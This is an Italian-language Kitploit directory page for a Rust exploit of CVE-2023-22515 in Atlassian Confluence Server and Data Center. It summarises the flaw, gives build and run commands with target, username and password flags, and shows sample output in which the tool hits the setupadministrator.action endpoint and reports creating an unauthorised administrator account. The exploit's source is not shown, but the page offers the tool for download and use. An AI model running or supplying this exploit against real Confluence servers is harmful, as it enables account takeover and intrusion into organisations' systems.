Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-22515-joaoviictorti — Exploit basato su Rust per CVE-2023-22515 che crea account amministratore non autorizzati in Confluence Server e Data Center tramite controllo degli accessi compromesso. | Kitploit
Strumenti/GitHubGitHub/killvxk/cve-2023-22515-joaoviictorti
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubkillvxk/cve-2023-22515-joaoviictorti

CVE-2023-22515-joaoviictorti

Exploit basato su Rust per CVE-2023-22515 che crea account amministratore non autorizzati in Confluence Server e Data Center tramite controllo degli accessi compromesso.

Vedi Repository
32 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-22515

  • Panoramica
  • Compilazione
  • Utilizzo
  • Esecuzione di CVE-2023-22515

Panoramica

Confluence è un wiki aziendale basato sul web sviluppato dalla società australiana di software Atlassian. Atlassian è stata informata di un problema segnalato da alcuni clienti in cui attaccanti esterni potrebbero aver sfruttato una vulnerabilità precedentemente sconosciuta nei server Confluence e nelle istanze data center accessibili pubblicamente per creare account amministratore Confluence non autorizzati e accedere alle istanze Confluence.

La vulnerabilità è stata classificata come CVE-2023-22515

Compilazione

Per prima cosa esegui la compilazione con il comando:

root@kitploit:~
cargo build --release

Utilizzo

Puoi farlo in questi due modi:

root@kitploit:~
cargo run -- --target http://localhost --username "teste" --password "teste" 
root@kitploit:~
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste" 

Questo mostrerà l'aiuto per lo strumento. Ecco tutti gli switch che supporta:

root@kitploit:~
CVE-2023-22515

Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>

Options:
  -t, --target <TARGET>      Insert target
  -u, --username <USERNAME>  Insert username
  -p, --password <PASSWORD>  Insert password
  -h, --help                 Print help

Esecuzione di CVE-2023-22515

root@kitploit:~
cargo run -- --target http://example.com --username "teste" --password "teste" 

[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!
Scarica lo strumento